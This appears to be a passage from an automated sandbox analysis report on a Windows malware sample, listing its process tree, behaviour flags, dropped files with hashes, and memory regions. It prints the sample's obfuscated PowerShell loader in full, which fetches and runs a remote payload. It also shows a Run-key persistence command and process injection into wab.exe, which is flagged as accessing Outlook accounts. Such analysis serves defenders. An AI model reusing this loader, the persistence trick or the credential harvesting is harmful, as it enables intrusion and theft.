:HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
7⤵
PID:4224

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
8⤵
PID:3356

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
9⤵
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
10⤵
- Adds Run key to start application
- Modifies registry key
PID:4172

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qlxrseijoiksbsncdmvgqbardsediy"
5⤵
PID:3504

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qlxrseijoiksbsncdmvgqbardsediy"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2728

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\andktxsdcrcflybgnxiitovimhnmjjnof"
5⤵
- Accesses Microsoft Outlook accounts
PID:3632

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lhicu"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:628

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\09B406FB8A13DE24E07EA97DC21FE315
Filesize
504B

MD5
acde2ebd73bf401c166d86a7e31406b0

SHA1
2ded266e34831ec8ba306a323424dd9209c49c59

SHA256
2d775df3e298eca8eea960c3a3ceaa0f055977ef26eb16ec36dc443a8243c49b

SHA512
18e3fa8c897cdb13ac76e06431dcf8a45d83438b296635c47b3f55d8a5b626fb54e8fcce05067fba415846d2652c14a4c1c194ec3878093713ab8e693b3a6d9b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\09B406FB8A13DE24E07EA97DC21FE315
Filesize
546B

MD5
cff6ca9b7762d0e0a03bb823d08a5b65

SHA1
75ae239d16e1277716114ef6a2a5eec96d9407e8

SHA256
b67073ece14f90788dda6253662235532524c6c0b29a5722edeaba272fd781ca

SHA512
f1beb7dc4b5a5e893715555846d3d51770c4dc5fc951bc69c5dc4d9704100f0340411262b3618f4420ef4c5b12d2026900a023bc6c46ff0799533579025ba0eb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
644d0087b654818f6b523a748779354b

SHA1
3c3d29532add1256604a21938225ca1e6584b8cd

SHA256
6f7a3fd3779c1c301fbf9a31a569814ab6c841788842e4b686763c60e1a26f38

SHA512
9f201e1b59698f1f1693378d512efc27cf1a8c568b2fd8fa922dde4bcd1d5357c7c04aeb45e73cd78ce8847cfdcbec40d82f844e9023a50304703014e150c247

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
71444def27770d9071039d005d0323b7

SHA1
cef8654e95495786ac9347494f4417819373427e

SHA256
8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

SHA512
a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

Download Submit
C:\Users\Admin\AppData\Local\Temp\Poodle.vbs
Filesize
187KB

MD5
8cc6be5a2911ea3dc1a05c80e20ede55

SHA1
5a68267614fc4f21b949dc82def16adb1a2a7178

SHA256
7dfd8c4c8c675118ad9020c10d439d7037b6d9e8a37482f80ae821fed5b29824

SHA512
cc57268ceca2b9911b1672d18692dca2bfcb65052c8b945614f766e66ed849bf8f14aa9076f7478026144f89995c1552ac596153bde157349bcca880094a264a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xvp4wmli.5oa.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\qlxrseijoiksbsncdmvgqbardsediy
Filesize
4KB

MD5
cf3a1bffdc9d8c82debb6f29d9b340cd

SHA1
a36a4793e51bb89c84bc3629254f1b48867eb4a9

SHA256
c478c1b2ac1314506490e4a682c38ebaba1965c910d3bafbbd9da4b020404355

SHA512
77c8a1ec2743372aff2f7de9e2363e498c6a66e51b1dc23d6012c50d0e1f1f6001bfe781f49dfa636e71575f3984f46d7a44f92351aafbe1546e7c193bfe444d

Download Submit
C:\Users\Admin\AppData\Roaming\Repset.Kbm
Filesize
506KB

MD5
03116708e93cfa36c93535d638ba367a

SHA1
dc7cc1dd01b70f9b6b20fdcf4e4d2a1f9c95aacc

SHA256
bd0734001fbf7acdd841f07540c22fa5655192603cf980a07d1689c437eff96f

SHA512
ae2783b050aca409369cbbe18be66658b272c663f3ac10e3906d158097c4d2871d3757f20e2e8f1675dc60e023f6a7b74b712a9ebc6653b1a8645c3b7c17a731

Download Submit
C:\Users\Admin\AppData\Roaming\belemnoidea.Fos
Filesize
519KB

MD5
9cc29e9c2f524984e4ea412888fad3ab

SHA1
a3d9571861e7f334d70d82eb0c46e10f5427358e

SHA256
6b8159ea57129f319affa7fa8ca8a74bb1e59894e7c269675df3f65b3c5e3887

SHA512
d5761c80074c464327e346f2c89daed8de0691cc7d60140648f94c3d45232c035cebde895234118480abf6cdad4e187fcfb5fdd393aace83a52df62b4a493396

Download Submit
memory/628-82-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/628-86-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/628-87-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2328-75-0x00000000064B0000-0x00000000064FC000-memory.dmp

Filesize
304KB

Download
memory/2328-73-0x0000000006080000-0x00000000063D4000-memory.dmp

Filesize
3.3MB

Download
memory/2728-76-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2728-77-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2728-79-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2936-110-0x0000000009050000-0x000000000EB95000-memory.dmp

Filesize
91.3MB

Download
memory/3384-23-0x0000000005B40000-0x0000000005BA6000-memory.dmp

Filesize
408KB

Download
memory/3384-22-0x0000000005AD0000-0x0000000005B36000-memory.dmp

Filesize
408KB

Download
memory/3384-42-0x0000000008BA0000-0x000000000AE91000-memory.dmp

Filesize
34.9MB

Download
memory/3384-19-0x0000000002850000-0x0000000002886000-memory.dmp

Filesize
216KB

Download
memory/3384-38-0x0000000007430000-0x00000000074C6000-memory.dmp

Filesize
600KB

Download
memory/3384-37-0x0000000006700000-0x000000000671A000-memory.dmp

Filesize
104KB

Download
memory/3384-36-0x00000000079C0000-0x000000000803A000-memory.dmp

Filesize
6.5MB

Download
memory/3384-35-0x00000000061B0000-0x00000000061FC000-memory.dmp

Filesize
304KB

Download
memory/3384-39-0x00000000073C0000-0x00000000073E2000-memory.dmp

Filesize
136KB

Download
memory/3384-20-0x00000000053B0000-0x00000000059D8000-memory.dmp

Filesize
6.2MB

Download
memory/3384-21-0x00000000052D0000-0x00000000052F2000-memory.dmp

Filesize
136KB

Download
memory/3384-34-0x0000000006170000-0x000000000618E000-memory.dmp

Filesize
120KB

Download
memory/3384-33-0x0000000005BB0000-0x0000000005F04000-memory.dmp

Filesize
3.3MB

Download
memory/3384-40-0x00000000085F0000-0x0000000008B94000-memory.dmp

Filesize
5.6MB

Download
memory/3420-45-0x00007FFA30950000-0x00007FFA31411000-memory.dmp

Filesize
10.8MB

Download
memory/3420-5-0x0000014352870000-0x0000014352892000-memory.dmp

Filesize
136KB

Download
memory/3420-44-0x00007FFA30953000-0x00007FFA30955000-memory.dmp

Filesize
8KB

Download
memory/3420-15-0x00007FFA30950000-0x00007FFA31411000-memory.dmp

Filesize
10.8MB

Download
memory/3420-16-0x00007FFA30950000-0x00007FFA31411000-memory.dmp

Filesize
10.8MB

Download
memory/3420-55-0x00007FFA30950000-0x00007FFA31411000-memory.dmp

Filesize
10.8MB

Download
memory/3420-4-0x00007FFA30953000-0x00007FFA30955000-memory.dmp

Filesize
8KB

Download
memory/3632-81-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3632-80-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3632-78-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3724-128-0x0000000000CC0000-0x0000000006805000-memory.dmp

Filesize
91.3MB

Download
memory/3724-117-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/3724-118-0x0000000000CC0000-0x0000000006805000-memory.dmp

Filesize
91.3MB

Download
memory/4188-91-0x0000000020150000-0x0000000020169000-memory.dmp

Filesize
100KB

Download
memory/4188-94-0x0000000020150000-0x0000000020169000-memory.dmp

Filesize
100KB

Download
memory/4188-95-0x0000000020150000-0x0000000020169000-memory.dmp

Filesize
100KB

Download
memory/4188-52-0x0000000001C60000-0x0000000003F51000-memory.dmp

Filesize
34.9MB

Download